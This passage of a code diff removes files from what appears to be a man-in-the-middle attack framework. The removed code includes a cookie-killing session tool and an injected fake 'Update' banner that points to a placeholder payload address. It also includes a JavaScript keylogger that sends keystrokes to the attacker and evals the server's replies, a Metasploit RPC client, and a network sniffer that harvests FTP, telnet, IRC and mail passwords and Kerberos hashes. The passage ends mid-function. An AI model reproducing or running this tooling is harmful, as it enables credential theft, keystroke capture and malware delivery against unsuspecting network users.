t.setDaemon(True)
t.start()
def on_config_change(self):
""" We can subclass this function to do stuff after the config file has been modified"""
pass

View file

@ -1,103 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import string
class CookieCleaner:
'''This class cleans cookies we haven't seen before. The basic idea is to
kill sessions, which isn't entirely straight-forward. Since we want this to
be generalized, there's no way for us to know exactly what cookie we're trying
to kill, which also means we don't know what domain or path it has been set for.
The rule with cookies is that specific overrides general. So cookies that are
set for mail.foo.com override cookies with the same name that are set for .foo.com,
just as cookies that are set for foo.com/mail override cookies with the same name
that are set for foo.com/
The best we can do is guess, so we just try to cover our bases by expiring cookies
in a few different ways. The most obvious thing to do is look for individual cookies
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
set by Javascript instead of a Set-Cookie header, and if we block those the site
will think cookies are disabled in the browser. So we do the expirations and whitlisting
based on client,server tuples. The first time a client hits a server, we kill whatever
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
'''
_instance = None
def __init__(self):
self.cleanedCookies = set();
self.enabled = False
@staticmethod
def getInstance():
if CookieCleaner._instance == None:
CookieCleaner._instance = CookieCleaner()
return CookieCleaner._instance
def setEnabled(self, enabled):
self.enabled = enabled
def isClean(self, method, client, host, headers):
if method == "POST": return True
if not self.enabled: return True
if not self.hasCookies(headers): return True
return (client, self.getDomainFor(host)) in self.cleanedCookies
def getExpireHeaders(self, method, client, host, headers, path):
domain = self.getDomainFor(host)
self.cleanedCookies.add((client, domain))
expireHeaders = []
for cookie in headers['cookie'].split(";"):
cookie = cookie.split("=")[0].strip()
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
expireHeaders.extend(expireHeadersForCookie)
return expireHeaders
def hasCookies(self, headers):
return 'cookie' in headers
def getDomainFor(self, host):
hostParts = host.split(".")
return "." + hostParts[-2] + "." + hostParts[-1]
def getExpireCookieStringFor(self, cookie, host, domain, path):
pathList = path.split("/")
expireStrings = list()
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
if len(pathList) > 2:
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
return expireStrings

View file

@ -1,45 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
class DnsCache:
'''
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
'''
_instance = None
def __init__(self):
self.customAddress = None
self.cache = {}
@staticmethod
def getInstance():
if DnsCache._instance == None:
DnsCache._instance = DnsCache()
return DnsCache._instance
def cacheResolution(self, host, address):
self.cache[host] = address
def getCachedAddress(self, host):
if host in self.cache:
return self.cache[host]
return None

View file

@ -1,24 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class FerretProxy(HTTPChannel):
requestFactory = ClientRequest

View file

@ -1,71 +0,0 @@
<script>
var newHTML = document.createElement('div');
newHTML.innerHTML = ' \
<style type="text/css"> \
\
#headerupdate { \
display:none; \
position: fixed !important; \
top: 0 !important; \
left: 0 !important; \
z-index: 2000 !important; \
width: 100% !important; \
height: 40px !important; \
overflow: hidden !important; \
font-size: 14px !important; \
color: black !important; \
font-weight: normal !important; \
background-color:#F0F0F0 !important; \
border-bottom: 1px solid #A0A0A0 !important; \
\
} \
\
#headerupdate h1 { \
float: left !important; \
margin-left: 2px !important; \
margin-top: 14px !important; \
padding-left: 30px !important; \
font-weight:normal !important; \
font-size: 13px !important; \
\
background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABsAAAAOCAYAAADez2d9AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAACnSURBVDhP5ZRNCgMhDIWj6ELwFt7JE3gkT+GRPIVLwZ8Wpy4KNXFm6KLQDx4qgbwkoiyl9AAE7z0opUBrDaUUyDmDc24bw+BzXVJrnbsX72cqhkF2FmMEKSUIIaD3fiQ0xmxjGKhZCOFIcgXOOVhr5+kTdIyj0mF2RbtRomattVuiQM1WlZ8RxW90tkp0RhR/aLa6/DOiQM0YY8tklMajpiC/q+8C8AS167V3qBALWwAAAABJRU5ErkJggg==") no-repeat left top !important; \
} \
\
#headerupdate ul { \
padding: 0 !important; \
text-align: right !important; \
} \
\
#headerupdate li { \
display: inline-block !important; \
margin: 0px 15px !important; \
text-align: left !important; \
} \
\
</style> \
<div id="headerupdate"> \
<h1> \
<strong> \
_TEXT_GOES_HERE_ \
</strong> \
</h1> \
\
<ul> \
\
<li> \
<a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_"> \
<button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;"> \
Update \
</button> \
\
</a> \
</li> \
</ul> \
</div> \
';
document.body.appendChild(newHTML);
document.getElementById("headerupdate").style.display = "block";
</script>

View file

@ -1,117 +0,0 @@
window.onload = function (){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener){
//console.log("first");
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
}
else if (window.attachEvent){
//console.log("second");
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
}
else {
//console.log("third");
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 0)
{
var3 = e.charCode
}
if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
}
function function1(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(encodeURIComponent(text), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=utf-8");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load diff

View file

@ -1,46 +0,0 @@
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
class logger:
log_level = None
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
fileHandler = logging.FileHandler(logfile)
fileHandler.setFormatter(formatter)
streamHandler = logging.StreamHandler(sys.stdout)
streamHandler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.propagate = False
logger.addHandler(streamHandler)
logger.addHandler(fileHandler)
logger.setLevel(self.log_level)
return logger

View file

@ -1,100 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
"""
Originally coded by @xtr4nge
"""
#import multiprocessing
import threading
import logging
import json
import sys
from flask import Flask
from core.configwatcher import ConfigWatcher
from core.proxyplugins import ProxyPlugins
app = Flask(__name__)
class mitmfapi(ConfigWatcher):
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
self.host = self.config['MITMf']['MITMf-API']['host']
self.port = int(self.config['MITMf']['MITMf-API']['port'])
@app.route("/")
def getPlugins():
# example: http://127.0.0.1:9999/
pdict = {}
#print ProxyPlugins().plugin_list
for activated_plugin in ProxyPlugins().plugin_list:
pdict[activated_plugin.name] = True
#print ProxyPlugins().all_plugins
for plugin in ProxyPlugins().all_plugins:
if plugin.name not in pdict:
pdict[plugin.name] = False
#print ProxyPlugins().pmthds
return json.dumps(pdict)
@app.route("/<plugin>")
def getPluginStatus(plugin):
# example: http://127.0.0.1:9090/cachekill
for p in ProxyPlugins().plugin_list:
if plugin == p.name:
return json.dumps("1")
return json.dumps("0")
@app.route("/<plugin>/<status>")
def setPluginStatus(plugin, status):
# example: http://127.0.0.1:9090/cachekill/1 # enabled
# example: http://127.0.0.1:9090/cachekill/0 # disabled
if status == "1":
for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0":
for p in ProxyPlugins().plugin_list:
if p.name == plugin:
ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"})
def startFlask(self):
app.run(debug=False, host=self.host, port=self.port)
#def start(self):
# api_thread = multiprocessing.Process(name="mitmfapi", target=self.startFlask)
# api_thread.daemon = True
# api_thread.start()
def start(self):
api_thread = threading.Thread(name='mitmfapi', target=self.startFlask)
api_thread.setDaemon(True)
api_thread.start()

View file

@ -1,159 +0,0 @@
#! /usr/bin/env python2.7
# MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
# Copyright (c) 2014-2016 Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import msgpack
import logging
import requests
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
class Msfrpc:
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self,opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
def encode(self, data):
return msgpack.packb(data)
def decode(self, data):
return msgpack.unpackb(data)
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
if method != "auth.login":
opts.insert(0, self.token)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
opts.insert(0, method)
payload = self.encode(opts)
r = requests.post(url, data=payload, headers=self.headers)
opts[:] = [] #Clear opts list
return self.decode(r.content)
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
class Msf(ConfigWatcher):
'''
This is just a wrapper around the Msfrpc class,
prevents a lot of code re-use throught the framework
'''
def __init__(self):
try:
self.msf = Msfrpc({"host": self.config['MITMf']['Metasploit']['rpcip'],
"port": self.config['MITMf']['Metasploit']['rpcport']})
self.msf.login('msf', self.config['MITMf']['Metasploit']['rpcpass'])
except Exception as e:
shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
@property
def version(self):
return self.msf.call('core.version')['version']
def jobs(self):
return self.msf.call('job.list')
def jobinfo(self, pid):
return self.msf.call('job.info', [pid])
def killjob(self, pid):
return self.msf.call('job.kill', [pid])
def findjobs(self, name):
jobs = self.jobs()
pids = []
for pid, jobname in jobs.iteritems():
if name in jobname:
pids.append(pid)
return pids
def sessions(self):
return self.msf.call('session.list')
def sessionsfrompeer(self, peer):
sessions = self.sessions()
for n, v in sessions.iteritems():
if peer in v['tunnel_peer']:
return n
return None
def sendcommand(self, cmd):
#Create a virtual console
console_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [console_id, cmd])
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options
client = Msfrpc({})
# Login to the msfmsg server using the password "abc123"
client.login('msf','abc123')
# Get a list of the exploits from the server
mod = client.call('module.exploits')
# Grab the first item from the modules value of the returned dict
print "Compatible payloads for : %s\n" % mod['modules'][0]
# Get the list of compatible payloads for the first option
ret = client.call('module.compatible_payloads',[mod['modules'][0]])
for i in (ret.get('payloads')):
print "\t%s" % i

View file

@ -1,929 +0,0 @@
import logging
import binascii
import struct
import base64
import threading
import binascii
from core.logger import logger
from os import geteuid, devnull
from sys import exit
from urllib import unquote
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from urllib import unquote
from scapy.all import *
conf.verb=0
formatter = logging.Formatter("%(asctime)s [NetCreds] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("NetCreds", formatter)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
parsing_pcap = False
class NetCreds:
version = "1.0"
def sniffer(self, interface, ip):
try:
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
except Exception as e:
if "Interrupted system call" in e: pass
def start(self, interface, ip):
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def parse_pcap(self, pcap):
parsing_pcap=True
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use idential client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
